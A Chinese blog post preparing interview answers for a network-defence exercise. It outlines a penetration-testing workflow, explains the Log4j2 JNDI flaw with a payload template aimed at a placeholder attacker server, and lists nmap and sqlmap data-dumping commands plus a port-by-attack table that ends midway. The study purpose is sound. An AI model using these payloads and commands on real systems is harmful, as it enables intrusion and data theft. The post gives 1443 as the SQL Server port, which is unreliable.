<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.1/css/all.min.css" integrity="sha256-Z1K5uhUaJXA7Ll0XrZ/0JhX4lAtZFpT6jkKrEDT0drU=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.css" integrity="sha256-Vzbj7sDDS/woiFS3uNKo8eIuni59rjyNGtXfstRzStA=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.14.2","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":true,"style":"mac"},"bookmark":{"enable":true,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="前言准备提前记录一下冬奥护网行动面试可能会问的一些问题，以及对应的简要想法和答案 先介绍下你的技术情况​	熟练使用kali，包括但不仅限于以下工具：Metasploit、Nessus、burpsuite、nmap、sqlmap、beef等，还有些工具类似：Aircrack-ng（wifi网络监控、信息获取、破坏等功能）、hydra（协议爆破）了解基础使用用法。 ​	熟悉owasp top10，熟悉">
<meta property="og:type" content="article">
<meta property="og:title" content="冬奥护网项目面试问题">
<meta property="og:url" content="http://example.com/2022/01/09/06-%E5%86%AC%E5%A5%A5%E6%8A%A4%E7%BD%91%E9%9D%A2%E8%AF%95%E9%97%AE%E9%A2%98%E5%87%86%E5%A4%87%20/index.html">
<meta property="og:site_name" content="Cloudyun">
<meta property="og:description" content="前言准备提前记录一下冬奥护网行动面试可能会问的一些问题，以及对应的简要想法和答案 先介绍下你的技术情况​	熟练使用kali，包括但不仅限于以下工具：Metasploit、Nessus、burpsuite、nmap、sqlmap、beef等，还有些工具类似：Aircrack-ng（wifi网络监控、信息获取、破坏等功能）、hydra（协议爆破）了解基础使用用法。 ​	熟悉owasp top10，熟悉">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://raw.githubusercontent.com/Cloudyunn/img/master/note/202201101050307.jpeg">
<meta property="og:image" content="https://raw.githubusercontent.com/Cloudyunn/img/master/note/202201101519628.png">
<meta property="article:published_time" content="2022-01-09T09:36:01.000Z">
<meta property="article:modified_time" content="2023-02-24T06:02:19.960Z">
<meta property="article:author" content="Yann Cheung">
<meta property="article:tag" content="网安">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/Cloudyunn/img/master/note/202201101050307.jpeg">


<link rel="canonical" href="http://example.com/2022/01/09/06-%E5%86%AC%E5%A5%A5%E6%8A%A4%E7%BD%91%E9%9D%A2%E8%AF%95%E9%97%AE%E9%A2%98%E5%87%86%E5%A4%87%20/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"http://example.com/2022/01/09/06-%E5%86%AC%E5%A5%A5%E6%8A%A4%E7%BD%91%E9%9D%A2%E8%AF%95%E9%97%AE%E9%A2%98%E5%87%86%E5%A4%87%20/","path":"2022/01/09/06-冬奥护网面试问题准备 /","title":"冬奥护网项目面试问题"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>冬奥护网项目面试问题 | Cloudyun</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Cloudyun</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">Yann Cheungの博客</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags<span class="badge">17</span></a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories<span class="badge">5</span></a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives<span class="badge">33</span></a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%85%88%E4%BB%8B%E7%BB%8D%E4%B8%8B%E4%BD%A0%E7%9A%84%E6%8A%80%E6%9C%AF%E6%83%85%E5%86%B5"><span class="nav-number">1.1.</span> <span class="nav-text">先介绍下你的技术情况</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%A6%82%E6%9E%9C%E8%AE%A9%E4%BD%A0%E6%B8%97%E9%80%8F%E4%B8%80%E4%B8%AA%E7%BD%91%E7%AB%99%EF%BC%8C%E4%BD%A0%E7%9A%84%E6%80%9D%E8%B7%AF%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F"><span class="nav-number">1.2.</span> <span class="nav-text">如果让你渗透一个网站，你的思路是什么？</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%AF%B4%E4%B8%80%E4%BA%9B%E8%BF%91%E6%AE%B5%E6%97%B6%E9%97%B4%E4%BD%A0%E4%BA%86%E8%A7%A3%E7%9A%84%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.3.</span> <span class="nav-text">说一些近段时间你了解的漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BB%A5%E5%89%8D%E6%8C%96%E8%BF%87%E5%93%AA%E4%BA%9B%E7%BD%91%E7%AB%99%E7%9A%84%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.4.</span> <span class="nav-text">以前挖过哪些网站的漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%AF%B4%E5%87%A0%E4%B8%AA%E4%BD%A0%E6%AF%94%E8%BE%83%E5%B8%B8%E7%94%A8%E7%9A%84%E5%B7%A5%E5%85%B7"><span class="nav-number">1.5.</span> <span class="nav-text">说几个你比较常用的工具</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E7%AB%AF%E5%8F%A3%E5%8F%B7%E5%8F%8A%E7%9B%B8%E5%85%B3%E6%9C%8D%E5%8A%A1%E3%80%81%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.6.</span> <span class="nav-text">常见端口号及相关服务、漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SQL%E6%B3%A8%E5%85%A5%E5%8E%9F%E7%90%86"><span class="nav-number">1.7.</span> <span class="nav-text">SQL注入原理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86"><span class="nav-number">1.8.</span> <span class="nav-text">反序列化漏洞原理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%A6%82%E4%BD%95%E5%8E%BB%E6%B5%8B%E8%AF%95SQL%E6%B3%A8%E5%85%A5-x2F-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-x2F-XSS-x2F-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0-x2F-%E8%B6%8A%E6%9D%83%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.9.</span> <span class="nav-text">如何去测试SQL注入&#x2F;反序列化&#x2F;XSS&#x2F;文件上传&#x2F;越权漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E7%9A%84%E7%BB%95%E8%BF%87%E6%96%B9%E6%B3%95%E6%9C%89%E5%93%AA%E4%BA%9B"><span class="nav-number">1.10.</span> <span class="nav-text">文件上传漏洞的绕过方法有哪些</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E6%9C%89%E5%93%AA%E4%BA%9B%E5%88%A9%E7%94%A8%E6%89%8B%E6%B3%95"><span class="nav-number">1.11.</span> <span class="nav-text">SQL注入漏洞有哪些利用手法</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%AF%94%E8%BE%83%E5%96%9C%E6%AC%A2%E7%94%A8%E5%93%AA%E5%87%A0%E7%A7%8D%E5%B7%A5%E5%85%B7%EF%BC%8C%E5%AE%83%E4%BB%AC%E7%9A%84%E4%BC%98%E5%8A%BF%E6%98%AF%E4%BB%80%E4%B9%88"><span class="nav-number">1.12.</span> <span class="nav-text">比较喜欢用哪几种工具，它们的优势是什么</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CSRF%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%8E%9F%E7%90%86"><span class="nav-number">1.13.</span> <span class="nav-text">CSRF漏洞的原理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SQL%E6%B3%A8%E5%85%A5%E3%80%81%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E3%80%81%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E3%80%81%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E3%80%81CSRF%E3%80%81XSS%E3%80%81XXE%E6%BC%8F%E6%B4%9E%E7%9A%84%E4%BF%AE%E5%A4%8D%E6%96%B9%E6%B3%95"><span class="nav-number">1.14.</span> <span class="nav-text">SQL注入、反序列化、文件包含、文件上传、CSRF、XSS、XXE漏洞的修复方法</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%A6%82%E6%9E%9C%E7%BD%91%E7%AB%99%E6%9C%89CDN%EF%BC%8C%E4%BD%A0%E5%A6%82%E4%BD%95%E6%9F%A5%E7%9C%8B%E4%BB%96%E7%9A%84%E7%9C%9F%E5%AE%9EIP%E5%9C%B0%E5%9D%80"><span class="nav-number">1.15.</span> <span class="nav-text">如果网站有CDN，你如何查看他的真实IP地址</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%A6%82%E4%BD%95%E5%88%A4%E6%96%AD%E6%98%AF%E5%90%A6%E6%9C%89CDN"><span class="nav-number">1.16.</span> <span class="nav-text">如何判断是否有CDN</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E6%8F%90%E6%9D%83%E6%96%B9%E5%BC%8F"><span class="nav-number">1.17.</span> <span class="nav-text">常见提权方式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%A6%82%E6%9E%9C%E6%9C%8D%E5%8A%A1%E5%99%A8%E8%A2%AB%E5%85%A5%E4%BE%B5%EF%BC%8C%E4%BD%A0%E4%BC%9A%E6%80%8E%E6%A0%B7%E8%BF%9B%E8%A1%8C%E6%BA%AF%E6%BA%90"><span class="nav-number">1.18.</span> <span class="nav-text">如果服务器被入侵，你会怎样进行溯源</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E7%9A%84%E4%B8%AD%E9%97%B4%E4%BB%B6%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E%E6%9C%89%E5%93%AA%E4%BA%9B"><span class="nav-number">1.19.</span> <span class="nav-text">常见的中间件解析漏洞有哪些</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%9C%A8Windows-x2F-linux%E7%9A%84%E5%8A%A0%E5%9B%BA%E9%97%AE%E9%A2%98%E4%B8%8A%EF%BC%8C%E4%BD%A0%E6%9C%89%E5%93%AA%E4%BA%9B%E6%96%B9%E6%B3%95"><span class="nav-number">1.20.</span> <span class="nav-text">在Windows&#x2F;linux的加固问题上，你有哪些方法</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#linux%E6%9C%8D%E5%8A%A1%E5%99%A8%E8%A2%AB%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8%E4%BA%86%EF%BC%8C%E8%AE%B2%E4%B8%80%E4%B8%8B%E4%BD%A0%E7%9A%84%E6%8E%92%E6%9F%A5%E6%B5%81%E7%A8%8B"><span class="nav-number">1.21.</span> <span class="nav-text">linux服务器被植入后门了，讲一下你的排查流程</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%80%8E%E4%B9%88%E6%9F%A5%E6%89%BE%E5%9F%9F%E6%8E%A7"><span class="nav-number">1.22.</span> <span class="nav-text">怎么查找域控</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Yann Cheung"
      src="/images/avatar.JPG">
  <p class="site-author-name" itemprop="name">Yann Cheung</p>
  <div class="site-description" itemprop="description">忆我少年游，一梦到华胥</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">33</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">17</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/Cloudyunn" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Cloudyunn" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>

        </div>
      </div>
        <div class="back-to-top animated" role="button" aria-label="Back to top">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/01/09/06-%E5%86%AC%E5%A5%A5%E6%8A%A4%E7%BD%91%E9%9D%A2%E8%AF%95%E9%97%AE%E9%A2%98%E5%87%86%E5%A4%87%20/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.JPG">
      <meta itemprop="name" content="Yann Cheung">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Cloudyun">
      <meta itemprop="description" content="忆我少年游，一梦到华胥">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="冬奥护网项目面试问题 | Cloudyun">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          冬奥护网项目面试问题
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2022-01-09 17:36:01" itemprop="dateCreated datePublished" datetime="2022-01-09T17:36:01+08:00">2022-01-09</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2023-02-24 14:02:19" itemprop="dateModified" datetime="2023-02-24T14:02:19+08:00">2023-02-24</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E6%8A%A4%E7%BD%91/" itemprop="url" rel="index"><span itemprop="name">护网</span></a>
        </span>
    </span>

  
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="Word count in article">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">Word count in article: </span>
      <span>6.9k</span>
    </span>
    <span class="post-meta-item" title="Reading time">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">Reading time &asymp;</span>
      <span>6 mins.</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>准备提前记录一下冬奥护网行动面试可能会问的一些问题，以及对应的简要想法和答案</p>
<h2 id="先介绍下你的技术情况"><a href="#先介绍下你的技术情况" class="headerlink" title="先介绍下你的技术情况"></a>先介绍下你的技术情况</h2><p>​	熟练使用kali，包括但不仅限于以下工具：Metasploit、Nessus、burpsuite、nmap、sqlmap、beef等，还有些工具类似：Aircrack-ng（wifi网络监控、信息获取、破坏等功能）、hydra（协议爆破）了解基础使用用法。</p>
<p>​	熟悉owasp top10，熟悉DVWA靶场上相关漏洞的愿一力以及漏洞利用方式。熟悉一些简单的网站漏洞，原理查询以及利用。</p>
<h2 id="如果让你渗透一个网站，你的思路是什么？"><a href="#如果让你渗透一个网站，你的思路是什么？" class="headerlink" title="如果让你渗透一个网站，你的思路是什么？"></a>如果让你渗透一个网站，你的思路是什么？</h2><ul>
<li><p>1、前期交互：客户需求、测试计划、目标、范围、条件等等（回答可以略过）</p>
</li>
<li><p>2、信息收集</p>
<ul>
<li><p>（1）服务器相关信息（真实IP、系统类型、版本、开放端口、WAF等），个人一般用shodan看基本信息。</p>
</li>
<li><p>（2）网站指纹识别（cms、cdn证书等），dns记录</p>
</li>
<li><p>（3）whois信息，姓名、备案、邮箱、电话反差等，为后面社会工程学准备</p>
</li>
<li><p>（4）子域名收集（google hack的site）：旁站查询、C段等，先看看旁站有没有通用性的cms或者其他漏洞，主站一般比较难。</p>
<ul>
<li><blockquote>
<p>CMS使用判别：应用程序的文件中出现的特征码来快速识别是哪一个CMS，在进行漏洞查找利用。或者利用一些工具来扫，例如御剑WEB指纹识别工具、cmscan</p>
</blockquote>
</li>
</ul>
</li>
<li><p>（5）Google hack进一步探测网站的信息、后台、敏感文件</p>
<ul>
<li><blockquote>
<p>site:	指定域名</p>
<p>intext:	正文中关键字</p>
<p>intitle:	标题中关键字</p>
<p>info：	基本信息</p>
<p>inurl：	URL存在关键字</p>
<p>filetype：	指定文件类型</p>
</blockquote>
</li>
</ul>
</li>
<li><p>（6）扫网站目录结构、爆后台，网站banner、测试文件、备份等敏感文件泄露等，如php探针。</p>
<blockquote>
<ul>
<li>常用工具：御剑后台扫描工具、burp、dirbuster等</li>
</ul>
</blockquote>
</li>
<li><p>（7）传输协议，通用漏洞，exp</p>
</li>
<li><p>（8）查看IP、指定IP端口扫描、对响应端口进行漏洞探测、例如samba、mysql、ftp、ssh、心脏出血等。</p>
</li>
</ul>
</li>
<li><p>3、漏洞挖掘</p>
<ul>
<li>（1）浏览网站结构，了解规模、功能、特点</li>
<li>（2）端口、弱口令、目录扫描</li>
<li>（3）XSS、SQL、命令注入、CSRF、cookie安全检测、暴力破解、敏感信息、文件包含、任意文件上传、重放攻击等，个人习惯一般先针对特定特点手动尝试，再用Nessus等漏洞扫描工具。</li>
</ul>
</li>
<li><p>4、漏洞利用</p>
<ul>
<li>利用前面方式getshell、webshell或者其他权限后，<strong>权限提升</strong>。可以使用mysql、windows低版本漏洞、linux内核版本漏洞提权。</li>
</ul>
</li>
<li><p>5、清除测试数据、输出报告</p>
<ul>
<li>（1）日志、测试数据的清理</li>
<li>（2）总结，形成渗透测试报告、修复方案等。</li>
</ul>
</li>
</ul>
<span id="more"></span>


<h2 id="说一些近段时间你了解的漏洞"><a href="#说一些近段时间你了解的漏洞" class="headerlink" title="说一些近段时间你了解的漏洞"></a>说一些近段时间你了解的漏洞</h2><ul>
<li><p>1、2021.11.24阿里云安全团队披露的Apache Log4j2远程代码执行漏洞(RCE)</p>
<blockquote>
<p>Apache Log4j2是一款优秀的Java日志框架，广泛应用于<strong>中间件、开发框架与Web应用</strong>中，用来记录日志信息。由于其作为<strong>基础组件</strong>广泛应用于很多Java框架和项目中，影响了数以万计的应用，因此绝大多数使用Java项目的公司都会被波及。 </p>
<p>影响应用及组件：Apache Solr、Apache Struts2、Apache Flink、Apache Druid、spring-boot-strater-log4j2等等</p>
<p>由于Apache Log4j2某些功能存在递归解析功能，攻击者就可以直接构造恶意请求，触发远程代码执行漏洞，漏洞的poc已被公开，默认配置就可以进行利用（无需特殊环境）</p>
<p>原理：漏洞成因在于log4j2提供的<strong>lookup</strong>功能。日志中包含 ${}，lookup功能就会将表达式的内容替换为表达式解析后的内容，而不是表达式本身。其中的<strong>JNDI</strong>就是利用的主题，因为其解析未做限制，可以直接访问到远程对象，当记录日志的一部分是用户可控时，就可以构造恶意字符串使服务器记录日志时调用JNDI访问恶意对象，也就是流传出的payload构成：</p>
</blockquote>
</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$&#123;jndi:ldap:xxx.xxx.xxx.xxx:xxxx/exp&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/Cloudyunn/img/master/note/202201101050307.jpeg"></p>
<blockquote>
<p>攻击思路：</p>
<ul>
<li>（1）找到目标服务器记录日志的地方，且记录的部分内容可控</li>
<li>（2）搭建RMI服务器，包含需要执行的恶意代码</li>
<li>（3）构建EXP触发目标服务器进行日志记录触发JNDI解析</li>
<li>（4）解析结果定位到搭建的恶意服务端，目标服务器访问并触发恶意代码</li>
</ul>
</blockquote>
<h2 id="以前挖过哪些网站的漏洞"><a href="#以前挖过哪些网站的漏洞" class="headerlink" title="以前挖过哪些网站的漏洞"></a>以前挖过哪些网站的漏洞</h2><p>DVWA靶场几乎所有的漏洞、课题组网站的漏洞（sql注入）</p>
<h2 id="说几个你比较常用的工具"><a href="#说几个你比较常用的工具" class="headerlink" title="说几个你比较常用的工具"></a>说几个你比较常用的工具</h2><ul>
<li>nmap</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">-sT							TCP connect扫描，最基本的方式，很容易被检测</span><br><span class="line">-sS							TCP SYN同步扫描，为半开扫描，很少有系统能记入日志。</span><br><span class="line">-sV							版本探测</span><br><span class="line">-sA							ACK扫描，通常可以穿过防火墙</span><br><span class="line">-sW							滑动窗口扫描，类似sA</span><br><span class="line">-sR							RPC扫描，和其他不同扫描方法结合使用</span><br><span class="line">-sM							TCP	Maimon扫描</span><br><span class="line"></span><br><span class="line">-p	20-30/139/60000			指定端口扫描</span><br><span class="line">-P-							扫描0-65535全部端口</span><br><span class="line">-P0							扫描之前不ping主机</span><br><span class="line">-Pn							选项指示NMAP跳过默认的发现检查并对执行对目标的完整端口扫描。当扫描被阻止ping探针的防火墙保护的主机时，这是非常有用的</span><br><span class="line">-n							禁用反向DNS解析</span><br></pre></td></tr></table></figure>

<ul>
<li>sqlmap</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">sqlmap	-u	&quot;http://www.xx.com?id=x&quot;	查询是否有诸如点</span><br><span class="line">--dbs									检测站点包含哪些数据库</span><br><span class="line">--current-db							获取当前数据库名</span><br><span class="line">--tables -D “db_name”					获取指定数据库表名</span><br><span class="line">--columns  -T &quot;table_name&quot; -D &quot;db_name&quot;	获取数据库表中的字段</span><br><span class="line">--dump -C &quot;columns_name&quot; -T &quot;table_name&quot; -D &quot;db_name&quot;获取字段的数据内容</span><br><span class="line"></span><br><span class="line">--cookie &quot;cookie&quot; --level 2				coockie注入，后接coockie值</span><br><span class="line">--threads								线程，最高为10</span><br><span class="line"></span><br><span class="line">post注入：</span><br><span class="line">（1）目标地址http:// www.xxx.com /login.asp</span><br><span class="line">（2）打开burp代理。</span><br><span class="line">（3）点击表单提交</span><br><span class="line">（4）burp获取拦截信息（post）</span><br><span class="line">（5）右键保存文件（.txt）到指定目录下</span><br><span class="line">（6）运行sqlmap并执行如下命令：sqlmap -r okay.txt  -p  username</span><br></pre></td></tr></table></figure>

<h2 id="常见端口号及相关服务、漏洞"><a href="#常见端口号及相关服务、漏洞" class="headerlink" title="常见端口号及相关服务、漏洞"></a>常见端口号及相关服务、漏洞</h2><table>
<thead>
<tr>
<th>端口</th>
<th>服务</th>
<th>入侵方式</th>
</tr>
</thead>
<tbody><tr>
<td>21</td>
<td>ftp&#x2F;tftp&#x2F;vsftpd文件传输协议</td>
<td>爆破&#x2F;嗅探&#x2F;溢出&#x2F;后门——vsftpd漏洞</td>
</tr>
<tr>
<td><strong>22</strong></td>
<td>ssh远程连接</td>
<td>爆破&#x2F;openssh漏洞</td>
</tr>
<tr>
<td><strong>23</strong></td>
<td>Telnet远程连接</td>
<td>爆破&#x2F;嗅探&#x2F;弱口令</td>
</tr>
<tr>
<td>25</td>
<td>SMTP邮件服务</td>
<td>邮件伪造</td>
</tr>
<tr>
<td>53</td>
<td>DNS域名解析系统</td>
<td>域传送&#x2F;劫持&#x2F;缓存投毒&#x2F;欺骗</td>
</tr>
<tr>
<td>67&#x2F;68</td>
<td>dhcp服务</td>
<td>劫持&#x2F;欺骗</td>
</tr>
<tr>
<td>110</td>
<td>pop3</td>
<td>爆破&#x2F;嗅探</td>
</tr>
<tr>
<td><strong>139</strong></td>
<td>samba服务</td>
<td>爆破&#x2F;未授权访问&#x2F;RCE</td>
</tr>
<tr>
<td>161</td>
<td>SNMP协议</td>
<td>爆破&#x2F;搜集目标内网信息</td>
</tr>
<tr>
<td><strong>445</strong></td>
<td>smb，也是一种TCP端口，win低版本和139相同</td>
<td>ms17-010&#x2F;端口溢出</td>
</tr>
<tr>
<td>1080</td>
<td>socket</td>
<td>爆破</td>
</tr>
<tr>
<td>1443</td>
<td>SQLserver的默认端口</td>
